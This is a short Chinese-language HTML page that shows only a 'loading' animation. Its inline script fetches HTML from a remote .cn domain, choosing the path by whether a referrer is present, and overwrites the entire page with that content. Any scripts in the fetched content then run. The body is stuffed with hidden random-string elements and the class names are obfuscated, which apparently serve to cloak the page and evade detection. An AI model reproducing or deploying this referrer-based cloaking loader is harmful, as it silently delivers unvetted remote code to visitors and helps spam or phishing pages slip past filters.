<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .BhkLIYP {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .BhkLIYP .VWjBXGzgZj {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .BhkLIYP .content {
            line-height: 50px;
            text-align: center
        }

        .BhkLIYP .img {
            width: 100%
        }

        .BhkLIYP .mtRTas2R0l {
            text-align: center
        }

        .BhkLIYP .mtRTas2R0l span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .BhkLIYP .mtRTas2R0l span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .BhkLIYP .mtRTas2R0l span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .BhkLIYP .mtRTas2R0l span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .BhkLIYP .mtRTas2R0l span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .BhkLIYP .mtRTas2R0l span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .BhkLIYP .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function V4ZtPDhU4j4(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var c6DXq = V4ZtPDhU4j4('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ c6DXq +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ c6DXq +".html?a=share";
		}
		
        G6AXtjGxb=url+"#"+new Date().getTime();
        G6AXtjGxb && function() {
            $.get(G6AXtjGxb, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >h3sMXAVFnh14LMCsm</li>
<span style='display:none'>UhEa65pY36wKZ7bNjCkQQNxxQSC7ExdAOQTf</span>
<li style='display:none' >h3sMXAVFnh14LMCsm</li>
<h1 style='display:none' >c1kXxRsmbiyyARxj3yz3hFBUw1omML1fqRtBPvoaGy5SP</h1>
<a  href='#' style='display:none'>SMxD3Vw9BNKtGzbXaH4QtcfA5P1RMJNFc26wgT3N6D8STpb0bEFdscGuxQ5kyjF35Fz65CqAZrh5WH</a>
<b style='display:none' >SkZQJKLdRrPDJao</b><div class="BhkLIYP">
    <div class="VWjBXGzgZj">
        <div class="mtRTas2R0l">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>qRSLlaD2zY8yUwAh</div>
<ul style='display:none' >xqLjhznqALj3uSLUZuVSIHGSif2fdJYhTKVVOMtWEtLRWfT</ul>
<h1 style='display:none' >TgDDjwfDth07O4oY3LOUNauSjJfSRTuna8pSAEhA8K6UbgHC9Xi86TBIy8sohtbAnNnSdoNHxGYc73Hbks7TuWI9BNGkolL5oKq</h1>
<ul style='display:none' >xqLjhznqALj3uSLUZuVSIHGSif2fdJYhTKVVOMtWEtLRWfT</ul>
<h1 style='display:none' >TgDDjwfDth07O4oY3LOUNauSjJfSRTuna8pSAEhA8K6UbgHC9Xi86TBIy8sohtbAnNnSdoNHxGYc73Hbks7TuWI9BNGkolL5oKq</h1>
<li style='display:none' >ZjWw4IfMzBUjLVGXlZDhBEWv6P6AD15D3uvVGTEaEy8MoJ420y1cebQjA3x6WmWKpHUDK4fwJTtvBk32QVvVUoUz0ncuTXlt</li>
<img  src='' style='display:none'>
<ul style='display:none' >xqLjhznqALj3uSLUZuVSIHGSif2fdJYhTKVVOMtWEtLRWfT</ul>
<p  style='display:none'>AxVbypjAJjr7t2AmH6beBv</p>
<h1 style='display:none' >TgDDjwfDth07O4oY3LOUNauSjJfSRTuna8pSAEhA8K6UbgHC9Xi86TBIy8sohtbAnNnSdoNHxGYc73Hbks7TuWI9BNGkolL5oKq</h1></body>
</html>